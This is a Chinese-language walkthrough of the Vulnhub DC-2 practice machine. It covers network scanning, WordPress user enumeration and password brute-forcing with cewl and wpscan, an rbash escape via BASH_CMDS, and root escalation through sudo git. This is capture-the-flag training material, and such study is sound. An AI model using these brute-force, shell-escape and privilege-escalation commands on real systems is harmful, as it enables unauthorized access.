Vulnhub實戰靶場:DC-2


一、環境搭建

1、官網下載連接:https://www.vulnhub.com/entry/dc-2,311/

2、下載之后,使用Oracle VM VirtualBox導入靶場環境

3、為了正常練習,將靶場的網卡模式設置為橋接模式,啟動即可

 二、靶場攻略

1、使用nmap快速掃描的命令:nmap -sP --min-hostgroup 1024 --min-parallelism 1024 192.168.1.0/24,識別到靶場主機ip

 2、使用命令:nmap -A -p- -T4 192.168.1.5,探測靶場突破口

 開放了7744端口號,服務為ssh,80端口,服務為http

3、訪問80端口,尋找進一步突破口,直接使用ip訪問會跳轉到http://dc-2/,所以添加hosts文件,讓這個跳轉域名來訪問靶場ip

在/etc/hosts文件中添加域名

成功訪問域名,並得到flag1

 

 4、根據提示,提示使用cewl來生成字典

輸入命令:cewl dc-2 > password,爬取dc-2頁面,將關鍵字生成字典寫入到password文件中

5、查看網站源碼,發現網站中URL目錄結構為wp-*的,猜測網站為wordpress搭建的 

 

 6、使用wpscan這個專門掃描檢測wordpress搭建的工具來查看是否存在已知漏洞

使用命令:wpscan --url dc-2,掃到wordpress的版本,ip地址等信息

 使用命令:wpscan --url dc-2 -e u,用戶信息枚舉,得到幾個可以用來登錄的賬戶

 7、使用得到的用戶名,創建一個username用戶文件.

使用命令:wpscan --url dc-2 -U username -P password,使用得到的用戶名還有cewl得到的密碼嘗試爆破,成功爆破出兩個賬戶密碼

 8、因為wordpress的后台登錄目錄是公開的,所以直接訪問/wp-admin,成功出現后台登錄界面

使用爆破的賬戶密碼,登錄成功

 在jerry賬戶中,得到flag2

 9、根據flag2的提示,找另一個入口,想到ssh服務,使用命令:ssh tom@192.168.1.5 -p 7744,成功登錄ssh

 得到flag3,因為cat無法使用,所以使用vi命令,得到提示

 10、因為使用tab,cat等命令無法使用,所以知道當前賬戶是受限制的,所以可以進行rbash繞過

輸入以下命令:

BASH_CMDS[a]=/bin/bash
a
/bin/bash
export PATH=PATH:/sbin:/bin

輸入之后,可以正常使用受限制的命令了

 11、進行收集信息,使用命令:ls -alhR /home,得到flag4和jerry賬戶信息

 

 12、根據flag4的提示信息,明顯是要使用git提權

使用命令:su jerry,切換到jerry賬戶

使用命令:sudo -l,查看可以無密碼使用root權限的命令,果然是git

 13、查詢到git提權的方法

 輸入命令:sudo git help config

之后直接在出現的help界面,輸入 !/bin/bash,成功提權

 切換到root賬戶根目錄,成功得到最后的final-flag.txt 

 完


免責聲明!

本站轉載的文章為個人學習借鑒使用,本站對版權不負任何法律責任。如果侵犯了您的隱私權益,請聯系本站郵箱yoyou2525@163.com刪除。



 
粵ICP備18138465號   © 2018-2025 CODEPRJ.COM